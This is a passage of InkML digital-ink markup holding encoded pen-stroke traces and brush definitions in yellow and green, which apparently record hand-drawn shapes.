  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 657 24575,'27'-1'0,"0"2"0,0 0 0,-1 2 0,1 1 0,38 11 0,148 63 0,-133-47 0,-51-19 0,60 17 0,-82-27 0,1 1 0,-1 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,6 6 0,-8-6 0,1 0 0,0 0 0,0-1 0,0 1 0,1-1 0,-1-1 0,1 1 0,13 2 0,14 2 0,0 2 0,-1 1 0,50 22 0,-41-15 0,56 15 0,32-7 0,-99-19 0,50 17 0,-19-4 0,265 67 0,-282-74 0,61 25 0,88 33 0,-88-34 0,-57-19 0,-1-1 0,53 9 0,73 19 0,-156-40 0,-1 0 0,23 10 0,-24-8 0,0-1 0,30 6 0,236 40 0,-238-39 0,64 11 0,-67-14 0,49 16 0,-26-7 0,176 42 0,-186-42 0,-39-12 0,0 0 0,31 5 0,-24-6 0,-1 1 0,37 14 0,-39-13 0,0 0 0,-1-1 0,2-1 0,20 2 0,79 14 0,-87-13 0,1-2 0,65 4 0,-77-8 0,0 0 0,0 2 0,0 0 0,0 2 0,21 8 0,28 7 0,-26-8 0,1 3 0,47 24 0,-61-25 0,-15-7 0,1 0 0,32 9 0,22 5 0,120 54 0,-179-72 0,0-1 0,0 0 0,1 0 0,0-1 0,-1-1 0,1 0 0,16-1 0,-15 0 0,0 0 0,0 1 0,0 0 0,-1 1 0,1 1 0,13 4 0,-6 0 0,0-2 0,0 0 0,1-1 0,-1-1 0,25 0 0,-25-2 0,109 19 0,1 2 0,-101-17 0,0 2 0,42 16 0,-1-1 0,116 22 0,-151-34 0,58 10 0,-49-11 0,-29-6 0,0 0 0,21 2 0,-13-3 0,1 2 0,47 12 0,-50-9 0,0-2 0,1-1 0,-1 0 0,24 0 0,-19-3 0,51 10 0,-31-3 0,55 11 0,-67-11 0,0-2 0,0-1 0,39 1 0,-69-6 0,22-1 0,1 1 0,-1 2 0,48 9 0,-40-6 0,0-1 0,0-1 0,1-2 0,38-4 0,6 1 0,-46 4 0,50 8 0,-49-5 0,46 2 0,-45-6 0,39 8 0,-38-4 0,38 1 0,-41-4 0,40 7 0,-40-4 0,41 1 0,50 4 0,1 1 0,5 0-110,0 0-597,-86-9 707,86 17 0,9 1 0,-80-17-421,-22-1 356,55 8 0,-72-6 59,27 6-93,0-3 1,68 3-1,-87-9 179,43 9 1,-43-6-3,42 2 1,46-7-79,84 2 0,-122 10 0,-49-7 0,46 3 0,638-8 582,-682 0-582,46-9 0,-45 5 0,44-1 0,1052 5-472,-508 3 280,-586-4 192,45-8 0,27 0 0,-38 5-91,0-3 0,78-19 1,-20 0 598,-28 8 271,-63 11-639,0 2-1,54-4 1,-56 8-140,40-8 0,-9 1 0,51-11 0,-78 12 0,1 1 0,49-1 0,-61 6 0,38-7 0,-38 4 0,37-1 0,-20 5 0,-5 1 0,0-2 0,48-8 0,64-12 0,-26 9 0,-83 11 0,43-8 0,124-42 0,-20-1 0,-54 14 0,-76 23 93,163-39-778,-164 42 679,143-23-31,-126 32 37,-47 4 0,1-2 0,-1-1 0,51-12 0,128-43 99,81-20 450,-110 32-562,26-2 13,-154 39 0,-36 7 0,1-1 0,26-9 0,-10 1 0,0 1 0,1 1 0,0 1 0,38-3 0,82-10 0,-133 17 0,-1 0 0,1-2 0,-1 0 0,0-1 0,23-13 0,12-4 0,-37 16 0,0 0 0,17-13 0,-20 13 0,0 0 0,0 1 0,26-10 0,89-32 0,-60 23 0,-45 16 0,0 2 0,37-10 0,17-1 0,41-6 0,-94 19 0,-1 0 0,0-1 0,-1-2 0,42-21 0,-18 8 0,25-8 0,-19 8 0,66-37 0,-82 39 0,-25 15 0,1-1 0,-2-1 0,1 0 0,14-12 0,-11 7 0,1 1 0,1 1 0,0 0 0,0 1 0,0 1 0,34-12 0,-48 19 0,202-89 0,-184 79 0,32-21 0,-34 20 0,36-19 0,-19 13 0,48-33 0,-75 45 0,33-21 0,53-33 0,91-56 0,-143 93 0,2 1 0,0 2 0,2 3 0,71-20 0,-94 31 0,-1-1 0,21-10 0,-26 9 0,1 1 0,1 1 0,-1 1 0,21-4 0,4 2 0,0-3 0,0-1 0,67-29 0,63-31 0,-146 61 0,0-2 0,-1 0 0,47-31 0,-62 35 0,8-6 0,33-20 0,-4 6 0,-30 17 0,1 0 0,25-10 0,-30 14 0,0 0 0,0 0 0,-1-2 0,13-9 0,-13 7 0,2 2 0,-1 0 0,19-9 0,-18 11-227,0-1-1,-1-1 1,0 0-1,-1-1 1,18-15-1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05.178"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.05" units="cm"/>
      <inkml:brushProperty name="height" value="0.05" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">578 0 24575,'8'3'0,"-14"3"0,-15 3 0,-1-3 0,0 1 0,0 1 0,1 1 0,0 1 0,1 1 0,0 1 0,0 1 0,2 0 0,-1 1 0,-30 33 0,36-36 0,0 0 0,-1-1 0,0 0 0,-25 12 0,21-12 0,0 1 0,-23 18 0,34-24 0,0 0 0,0 0 0,-1-1 0,1 0 0,-11 3 0,-18 10 0,33-15 0,0 1 0,0 0 0,-1-1 0,1 1 0,1 0 0,-1 0 0,0 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,0 1 0,-1 0 0,2 0 0,-2 9 0,0 6 0,1 0 0,4 37 0,-1-16 0,-1-31 0,0-1 0,0 1 0,1-1 0,0 0 0,1 1 0,0-1 0,0 0 0,6 9 0,1 1 0,0 0 0,18 21 0,-20-30 0,-1-1 0,1 0 0,1 0 0,-1-1 0,1 0 0,1-1 0,-1 0 0,1 0 0,0-1 0,0 0 0,1-1 0,18 6 0,24 7 0,-42-13 0,-1 0 0,1 0 0,1-1 0,-1-1 0,14 2 0,-7-2 0,-1 1 0,1 0 0,28 11 0,9 1 0,-28-8 0,-1-2 0,1-1 0,44 1 0,-37-4 0,-21 0 0,1-1 0,-1 0 0,24-4 0,-33 3 0,-1 1 0,0-1 0,1 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 1 0,3-6 0,-2 2 0,0 0 0,1 1 0,0 0 0,1-1 0,-1 1 0,1 1 0,0-1 0,9-6 0,23-23 0,-34 28 0,0 0 0,0 0 0,-1-1 0,0 1 0,0 0 0,0-1 0,-1 1 0,0-1 0,0 0 0,-1 1 0,0-1 0,0-7 0,3-33 0,5-10 0,-3-1 0,-5-110 0,-2 68 0,1 86-114,0 1 1,0 0-1,-2 0 0,0 0 0,0 1 1,-1-1-1,0 1 0,-1 0 0,-1 0 1,0 0-1,-14-21 0,12 24-6712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5:57.860"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'371'0'0,"-355"1"0,1 1 0,28 6 0,-28-4 0,1-1 0,20 1 0,17-5 0,27 0 0,-76 1 0,1 1 0,-1 0 0,0 0 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 1 0,1 0 0,6 4 0,-8-3 0,1 0 0,-1 0 0,0 0 0,-1 1 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,-1-1 0,2 12 0,0 8 0,-1 0 0,-3 35 0,1-42 0,-2 6 0,-1 1 0,-1-1 0,-12 39 0,-3 17 0,7-17 0,-34 100 0,33-128-341,2 1 0,1 0-1,-6 46 1,15-65-6485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5:59.103"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'0'4'0,"0"5"0,0 4 0,0 4 0,0 3 0,0 1 0,0 1 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,0 0 0,0-1 0,0 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6:01.044"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">239 23 24575,'-4'2'0,"0"0"0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,1 0 0,0 0 0,-1 0 0,1 1 0,-3 3 0,-2 2 0,-41 49 0,39-44 0,0-1 0,-1-1 0,0 0 0,-23 19 0,31-29 0,0 1 0,1-1 0,-1 1 0,0 0 0,1 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,1-1 0,-1 1 0,0 4 0,-9 54 0,5-25 0,4-26 0,0 1 0,0-1 0,2 1 0,-1-1 0,1 1 0,1-1 0,0 1 0,2 11 0,-1-18 0,0 1 0,0-1 0,0 1 0,0-1 0,1 0 0,0 1 0,0-1 0,0-1 0,1 1 0,0 0 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,7 4 0,52 36 0,-50-31 0,1-2 0,0 0 0,0-1 0,1-1 0,20 8 0,-20-11 0,1-2 0,25 3 0,13 2 0,-14-3 0,0-1 0,0-1 0,65-6 0,-17 1 0,-5 4 0,92-5 0,-170 3 0,1-1 0,-1 0 0,0 0 0,0-1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0-1 0,7-7 0,-2-1 0,0 0 0,-1 0 0,0-1 0,11-25 0,10-13 0,-22 41 0,-1-1 0,-1 0 0,0 0 0,0-1 0,-1 1 0,-1-1 0,0-1 0,0 1 0,-2 0 0,3-18 0,-5 29 0,1-27 0,1 1 0,8-34 0,-9 54 0,1 1 0,-1 0 0,-1-1 0,1 1 0,-1 0 0,0-1 0,0 1 0,-2-11 0,1 14 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 1 0,-6-3 0,-141-75 0,137 73 0,0 0 0,0 1 0,-1 1 0,0 0 0,0 0 0,0 2 0,0-1 0,-1 2 0,-22-1 0,18 3-112,3 0-27,0-1 0,1 0-1,-1-1 1,0-1 0,1 0 0,-1 0-1,1-2 1,-23-8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6:05.225"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">20600 1913 24575,'-3'-1'0,"-1"0"0,1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 0 0,0 0 0,1 0 0,-1-1 0,-2-3 0,-9-6 0,-6-2 0,4 1 0,-2 1 0,1 1 0,-2 1 0,-27-12 0,32 16 0,1-1 0,0-1 0,1 0 0,0 0 0,0-1 0,1-1 0,0 0 0,-14-16 0,11 10 0,-2 1 0,0 1 0,-19-13 0,4 8 0,-38-16 0,58 29 0,0-2 0,0 1 0,0-1 0,1-1 0,-12-12 0,9 8 0,-30-22 0,-121-86 0,156 114 0,-36-24 0,26 19 0,0-1 0,-24-24 0,23 19 0,-1 1 0,-37-26 0,48 39 0,1 0 0,-1 0 0,0 0 0,-1 1 0,1 1 0,-17-3 0,17 3 0,-1 0 0,1 0 0,0 0 0,0-1 0,1-1 0,-1 0 0,-13-7 0,-106-79 0,110 78 0,0 1 0,-1 1 0,-22-9 0,-3-1 0,4 1 0,-39-21 0,66 30 0,-1 2 0,-1 0 0,0 0 0,0 2 0,0 0 0,0 0 0,-1 2 0,0 0 0,-22-3 0,19 4 0,0 0 0,0-2 0,0 0 0,0-1 0,1-1 0,0 0 0,1-2 0,-26-15 0,19 11 0,-34-11 0,-8-4 0,41 17 0,-54-16 0,54 20 0,-1-2 0,-32-15 0,41 16 0,0 2 0,0 0 0,-1 1 0,0 1 0,-22-2 0,15 2 0,-45-13 0,36 4 0,-1 2 0,0 1 0,-1 2 0,0 2 0,-56-3 0,71 7 0,1 0 0,-1-2 0,1 0 0,0-1 0,0-1 0,1 0 0,-29-15 0,36 17 0,0 0 0,0 0 0,0 1 0,0 1 0,-14-1 0,12 1 0,-1 0 0,1-1 0,-20-6 0,-136-48 0,10 13 0,52 22 0,75 14 0,7 1 0,0 2 0,-54-5 0,49 8 0,-33-7 0,34 4 0,-42-1 0,35 4 0,-45-8 0,7 0 0,-55-10 0,80 10 0,34 6 0,-1 0 0,-31-1 0,-14 4 0,22 2 0,0-3 0,-57-9 0,-77-11 0,35 1 0,49 8 0,16 4 0,-34-1 0,71 8 0,-36-7 0,34 4 0,-1 2 0,0 1 0,-40 4 0,-68-3 0,76-10 0,46 7 0,-50-4 0,-532 9 0,577-2 0,-47-9 0,45 5 0,-42-1 0,-880 7 0,939-2 0,-1-1 0,-28-6 0,27 4 0,1 1 0,-22-1 0,-535 2 0,280 4 0,273-2 0,1 1 0,-1 1 0,-35 8 0,-1 1 0,-92 6 0,104-13 0,-14 6 0,43-6 0,0-1 0,-23 1 0,19-2 0,-35 7 0,35-5 0,-37 3 0,-6-7 0,34-1 0,0 2 0,1 0 0,-50 10 0,54-7 0,0-1 0,-1-1 0,1-1 0,-29-2 0,-48 1 0,-17 21 0,71-19 0,-49 10 0,-47 10 0,110-18 0,-1-1 0,-48-2 0,48-2 0,0 2 0,-49 7 0,10 2 0,-1-4 0,-131-6 0,84-2 0,56 2 0,-3-2 0,0 4 0,-69 11 0,84-7 0,0-2 0,-58-4 0,59-1 0,1 3 0,-66 9 0,76-7 0,0 0 0,-67-5 0,-30 3 0,62 8 0,47-5 0,-48 2 0,-698-8 0,752 2 0,0 2 0,0 0 0,-39 12 0,38-9 0,0 0 0,0-2 0,-32 2 0,21-3 0,1 1 0,-56 14 0,11-1 0,-73 7 0,51-5 0,9 0 0,24-8 0,37-5 0,-1-2 0,-35 1 0,-113 9 0,98-5 0,14 1 0,39-6 0,-46 3 0,40-7 0,0 2 0,-47 8 0,43-5 0,1-1 0,-1-3 0,-44-3 0,-65 3 0,89 10 0,43-8 0,0 0 0,-23 2 0,18-5 0,1 1 0,-1 1 0,1 1 0,0 1 0,0 1 0,0 1 0,1 0 0,-28 14 0,34-15 0,0 0 0,0-1 0,0-1 0,0 0 0,-26 2 0,21-4 0,0 2 0,-25 7 0,-260 73 0,150-55 0,131-25 0,1 2 0,-27 8 0,25-6 0,-37 7 0,-72 16 0,102-21 0,0-1 0,-1-1 0,0-2 0,-40 1 0,54-5 0,1 1 0,0 0 0,1 1 0,-32 11 0,31-9 0,0 0 0,0-1 0,-1-1 0,-25 2 0,-2-1 0,-1 2 0,1 2 0,-57 17 0,49-12 0,37-9 0,-13 4 0,0-2 0,-1-1 0,-42 2 0,42-4 0,0 1 0,1 2 0,-1 0 0,-43 17 0,21-7 0,14-5 0,-55 7 0,52-10 0,-54 18 0,55-14 0,-49 8 0,74-17 0,-1 0 0,-25 11 0,29-9 0,0-1 0,0 0 0,-1-1 0,1-1 0,-16 2 0,-6-2 0,0 0 0,0 3 0,0 0 0,1 2 0,-1 2 0,-53 21 0,59-20 0,0-1 0,0-2 0,-1 0 0,-56 5 0,82-12 0,-40 4 0,31-4 0,1 0 0,0 1 0,0 1 0,0 0 0,0 0 0,0 1 0,0 0 0,-10 6 0,2-1 0,0-1 0,-35 9 0,-10 3 0,42-12 0,-1-1 0,-37 5 0,34-7 0,-44 13 0,-126 48 0,162-55 0,-51 10 0,-24 6 0,77-16 0,-38 5 0,39-10 0,-50 17 0,35-6 0,-1-2 0,-49 9 0,21-16 0,55-6 0,0 0 0,1 1 0,0 1 0,-25 8 0,-74 24 0,-63 25 0,169-56 0,0-1 0,0 0 0,-15 2 0,16-4 0,-1 1 0,1 1 0,0 0 0,-13 5 0,4 0 0,-1-1 0,0-1 0,0-1 0,-26 3 0,18-4 0,-41 14 0,63-16-124,1 0 0,-1-1 0,0 1 0,1-1 0,-1 0 0,0 0-1,0-1 1,0 0 0,0 0 0,-6-1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6:06.469"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">440 1 24575,'-3'1'0,"1"1"0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0 0 0,0-1 0,-1 5 0,-5 5 0,-11 11 0,-1-1 0,-23 21 0,34-35 0,-1 0 0,0 0 0,-1-1 0,0 0 0,0-1 0,-1-1 0,-14 6 0,19-8 0,0 0 0,1 0 0,0 0 0,-1 1 0,1 0 0,1 0 0,-1 1 0,1-1 0,-1 1 0,1 1 0,1-1 0,-1 1 0,1-1 0,0 1 0,-6 12 0,-25 31 0,7-22 0,-9 12 0,35-36 0,-2 1 0,1 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,1 0 0,-3 8 0,5-11 0,0 0 0,0 0 0,0-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,1 1 0,16 7 0,1 0 0,-1-1 0,1-1 0,36 8 0,4 2 0,-17 1 0,6 3 0,-11-9 0,48 21 0,5 2 0,-89-34 0,178 63 0,-166-56-1365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6:08.824"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 69 24575,'0'-2'0,"1"1"0,-1-1 0,1 0 0,-1 1 0,1-1 0,0 0 0,0 1 0,-1-1 0,1 1 0,0 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,2 0 0,39-18 0,-34 16 0,1-1 0,0 1 0,0 1 0,0-1 0,1 1 0,-1 1 0,1 0 0,0 1 0,16 1 0,-24-1 0,1 0 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 6 0,0 15 0,0 0 0,-2 0 0,-3 26 0,0 6 0,1-38 0,0-1 0,-2 1 0,0-1 0,-1 0 0,-1-1 0,-16 32 0,9-18 0,-40 59 0,57-90 0,0 1 0,0 0 0,0-1 0,1 0 0,-1 0 0,0 0 0,7-4 0,182-87 0,-177 85-44,0 1 0,0 1 0,18-4 0,-12 4-1145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2:46:11.427"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#008C3A"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">544 24 24575,'-26'-1'0,"15"0"0,-1 1 0,1 0 0,-1 1 0,1 0 0,-1 0 0,1 1 0,-1 1 0,1 0 0,0 0 0,-20 10 0,-32 15 0,54-25 0,0 0 0,0 0 0,0 1 0,0 1 0,1-1 0,0 1 0,0 1 0,0-1 0,1 1 0,0 1 0,0-1 0,-10 13 0,-17 27 0,24-34 0,1 0 0,0 1 0,1 0 0,0 0 0,1 0 0,0 1 0,-8 25 0,13-32 0,-1 0 0,1 0 0,-2 0 0,1-1 0,-1 1 0,0-1 0,-5 6 0,5-7 0,0 0 0,0 1 0,1-1 0,-1 1 0,2 0 0,-1 0 0,0 0 0,1 0 0,0 1 0,-1 7 0,-6 50 0,3-31 0,2 0 0,0 40 0,4-64 0,1 1 0,-1-1 0,2 0 0,-1 0 0,2 1 0,-1-1 0,1 0 0,0-1 0,1 1 0,0 0 0,0-1 0,8 11 0,9 10 0,24 29 0,-41-53 0,0 0 0,0 0 0,-1 1 0,0-1 0,4 8 0,-6-8 0,1-1 0,0 0 0,0 0 0,1 0 0,0 0 0,-1 0 0,1-1 0,0 1 0,1-1 0,-1 0 0,7 5 0,9 2 0,33 14 0,1 0 0,-38-17 0,0 0 0,1-2 0,0 0 0,0 0 0,30 3 0,-8-4 0,53-1 0,-35-2 0,-19 0 0,48-5 0,-75 3 0,0 0 0,-1-1 0,1 0 0,-1-1 0,1 0 0,-1-1 0,0 0 0,0 0 0,15-10 0,15-12 0,-29 20 0,0 0 0,-1 0 0,1-1 0,-2-1 0,1 0 0,8-9 0,31-39 0,-24 30 0,24-35 0,-41 50 0,-1 0 0,0 0 0,0-1 0,-1 1 0,0-1 0,5-25 0,12-71 0,-18 91 0,0-1 0,10-24 0,-8 25 0,0-1 0,4-21 0,-7 24 0,1 0 0,9-24 0,-8 28 0,-1-1 0,0 1 0,-1-1 0,-1 0 0,2-14 0,-4 21 0,2-14 0,-1 0 0,-2-1 0,1 1 0,-5-22 0,4 36 0,-1 0 0,1-1 0,-1 2 0,0-1 0,0 0 0,0 0 0,-1 0 0,0 1 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,0 0 0,-1 0 0,-8-4 0,-11-3 0,1 0 0,-1 2 0,0 1 0,-49-7 0,22 4 0,29 6 0,0 0 0,-35-1 0,14 5-1365,24 1-5461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25.030"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'1'0'0,"1"1"0,-1 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 1 0,0-1 0,0 3 0,13 25 0,-11-15 0,0 1 0,0-1 0,-2 1 0,1 0 0,-2 18 0,0-14 0,0 0 0,6 27 0,-1-10-455,0-1 0,-2 68 0,-3-85-6371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27.133"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">134 220 24575,'0'11'0,"-1"1"0,-1-1 0,0 1 0,-1-1 0,0 0 0,0 0 0,-1 0 0,-1 0 0,0 0 0,0-1 0,-1 0 0,-14 18 0,8-9 0,0 1 0,1 0 0,-14 39 0,21-50 0,2 1 0,-1-1 0,1 1 0,1 0 0,0-1 0,0 1 0,1 0 0,0 0 0,0 0 0,1 0 0,4 13 0,-4-17 0,1-1 0,0 1 0,1-1 0,-1 0 0,1 0 0,0 0 0,0 0 0,1 0 0,0-1 0,7 8 0,3 0 0,1 0 0,17 10 0,24 20 0,-42-30 0,1 0 0,0-1 0,1-1 0,0-1 0,34 15 0,-29-16 0,1-2 0,1 0 0,-1-1 0,37 3 0,92-5 0,-102-4 0,-43 1 0,1 0 0,-1-1 0,0 0 0,1-1 0,-1 1 0,0-1 0,0-1 0,0 1 0,8-5 0,48-35 0,-19 11 0,-34 25 0,0 0 0,-1 0 0,0 0 0,0-1 0,11-13 0,-15 16 0,-2 0 0,1-1 0,0 0 0,-1 1 0,0-1 0,0 0 0,0 0 0,-1 0 0,0 0 0,1 0 0,-2 0 0,1-1 0,-1-4 0,0-236 0,-2 99 0,0 131 0,0 0 0,-1 0 0,-1 0 0,0 1 0,-1 0 0,-1-1 0,-1 2 0,-14-26 0,19 36 0,-1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,0 0 0,-1-1 0,1 1 0,0 1 0,-1-1 0,0 1 0,1 0 0,-10-3 0,-7-1 0,-1 0 0,-27-2 0,-11-3 0,18-4 0,32 11 0,1 0 0,-1 1 0,0 0 0,-1 1 0,-15-2 0,6 3-1365,1 1-5461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29.598"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.1" units="cm"/>
      <inkml:brushProperty name="height" value="0.1" units="cm"/>
      <inkml:brushProperty name="color" value="#FFC114"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 0 24575,'22'1'0,"-1"0"0,0 1 0,31 7 0,-16-1 0,-21-6 0,0 2 0,0-1 0,0 2 0,0 0 0,-1 1 0,16 8 0,-19-8 0,1-1 0,0-1 0,0 0 0,1-1 0,-1 0 0,1 0 0,15 0 0,-11-1 0,-1 0 0,0 1 0,28 10 0,24 8 0,-48-16 0,37 15 0,-38-12 0,0-1 0,1 0 0,0-2 0,1 0 0,40 3 0,-30-3 0,41 11 0,-48-10 0,-1 0 0,1-2 0,41 2 0,-57-6 0,2 0 0,0 0 0,-1 0 0,1 0 0,0 1 0,-1 1 0,1 0 0,-1 0 0,0 1 0,1 0 0,9 5 0,9 5 0,51 15 0,-51-18 0,-8-5 0,0 0 0,28 2 0,-27-4 0,-1 0 0,28 9 0,-6 2 0,1-2 0,46 8 0,19 0 0,25 2 0,-14 2 0,-46-6 0,37 6 0,-60-16 0,-23-3 0,47 3 0,-56-7 0,0 2 0,-1 0 0,1 1 0,19 7 0,-19-6 0,-1 0 0,1-1 0,0-1 0,20 2 0,34 1-33,-1 3-1,0 3 0,94 30 1,-71-18-659,178 36 692,-82-23 0,-159-32-22,-2-2 192,-1 2 0,1 0-1,-2 2 1,40 15-1,-54-17-169,0-1 0,1 0 0,-1-1 0,1 0 0,19 1 0,-21-3 0,-7 0 0,-1 0 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 1 0,-1-1 0,1 1 0,-1 0 0,6 5 0,-6-5 0,0 0 0,1 1 0,0-2 0,0 1 0,0 0 0,0-1 0,0 1 0,0-1 0,1 0 0,-1-1 0,8 3 0,13 0 0,1 2 0,-1 0 0,-1 2 0,42 19 0,-19-8 0,58 17 0,-64-23 0,49 8 0,-65-17 0,-1 1 0,41 15 0,-32-9 0,0-1 0,1-2 0,0-1 0,39 2 0,-42-5 0,2 2 0,42 13 0,-7-2 0,106 26 0,56 24 0,-154-42 0,15 10 0,-60-22 0,0-2 0,50 13 0,110 19 0,-158-36 0,-1 1 0,50 21 0,-49-17 0,0 0 0,42 7 0,8 1 0,-61-13 0,1-2 0,-1 0 0,45 3 0,-39-5 0,0 0 0,0 2 0,-1 1 0,1 2 0,-1 0 0,32 15 0,-28-10 0,1-2 0,0-1 0,37 6 0,-30-9 0,0 2 0,54 20 0,-75-21 0,1-1 0,0 0 0,0-1 0,0-1 0,1-1 0,-1-1 0,26 1 0,-30-2 0,0 0 0,0 1 0,0 0 0,27 10 0,28 7 0,-36-15 0,96 21 0,-65 0 0,-55-21 0,0 0 0,1-1 0,0 0 0,0-1 0,0 0 0,0 0 0,13 0 0,-14-2 0,1 1 0,0 0 0,-1 1 0,1 0 0,17 8 0,23 7 0,-42-14 0,0-1 0,0 1 0,0 1 0,0 0 0,-1 0 0,0 1 0,12 10 0,-10-8 0,0-1 0,0 1 0,0-2 0,19 9 0,-3-4 0,-6-2 0,0-2 0,24 7 0,-31-10 0,0 0 0,0 1 0,0 1 0,12 8 0,25 11 0,-5-3 0,-36-17 0,0 0 0,1-1 0,0 1 0,19 4 0,-19-6 0,1 1 0,-1 0 0,14 6 0,29 12 0,-21-13 0,-2 2 0,1 1 0,-1 2 0,-1 0 0,0 2 0,50 38 0,-70-49 0,-1-1 0,1 0 0,0 0 0,0-1 0,0 0 0,0-1 0,0 0 0,20 2 0,-15-2 0,0 0 0,0 2 0,15 4 0,26 15 0,96 57 0,-130-69 0,1-1 0,31 10 0,-31-12 0,0 0 0,33 19 0,-11-5 0,-32-17 0,-1 1 0,21 12 0,-10-4 0,-1-2 0,2 0 0,0-2 0,37 12 0,0 1 0,-40-15 0,1-1 0,0-1 0,0-1 0,1-1 0,-1-1 0,1-1 0,34 0 0,-31 0 0,0 1 0,0 1 0,-1 1 0,1 1 0,-1 2 0,28 12 0,51 14 0,35-4 0,-68-16 0,93 32 0,-126-34 0,0-2 0,0-2 0,69 7 0,-72-10 0,-1 2 0,37 12 0,-38-10 0,-1-1 0,50 7 0,-47-11 0,56 16 0,4 1 0,-49-13 0,-26-3 0,39 2 0,38 5 0,-63-7 0,38 2 0,-40-5 0,34 6 0,-35-3 0,43 1 0,-45-4 0,41 7 0,-41-4 0,43 1 0,-46-6 0,1 0 0,-1 2 0,38 8 0,-39-6 0,0-1 0,1-1 0,0-1 0,27-3 0,49 3 0,8 20 0,-75-12 